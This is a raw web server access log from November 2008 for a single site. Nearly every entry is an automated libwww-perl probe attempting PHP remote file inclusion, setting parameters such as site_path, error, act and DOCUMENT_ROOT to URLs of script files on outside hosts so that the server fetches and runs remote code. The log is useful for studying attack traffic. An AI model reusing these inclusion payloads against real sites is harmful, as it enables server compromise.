89.218.85.18 - - [02/Nov/2008:23:55:52 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:55:53 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:23:57:39 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:23:57:39 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:23:57:41 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
207.150.183.60 - - [03/Nov/2008:00:02:43 -0800] "GET /logs/access.log/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [03/Nov/2008:00:02:43 -0800] "GET /errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [03/Nov/2008:00:02:43 -0800] "GET /logs/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [03/Nov/2008:00:03:01 -0800] "GET /logs/access.log/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [03/Nov/2008:00:03:01 -0800] "GET /errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [03/Nov/2008:00:03:01 -0800] "GET /logs/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.192.241.74 - - [03/Nov/2008:00:05:17 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [03/Nov/2008:00:05:17 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
78.111.80.12 - - [03/Nov/2008:00:13:18 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [03/Nov/2008:00:13:18 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [03/Nov/2008:00:13:19 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
204.200.195.110 - - [03/Nov/2008:00:16:30 -0800] "GET /logs/access_080901.log//index.php?DOCUMENT_ROOT=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
204.200.195.110 - - [03/Nov/2008:00:16:31 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
204.200.195.110 - - [03/Nov/2008:00:16:31 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
74.6.22.106 - - [03/Nov/2008:00:20:08 -0800] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
204.200.195.110 - - [03/Nov/2008:00:21:53 -0800] "GET /logs/access_080804.log//include/admin.lib.inc.php?site_path=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
204.200.195.110 - - [03/Nov/2008:00:21:54 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
204.200.195.110 - - [03/Nov/2008:00:21:54 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 4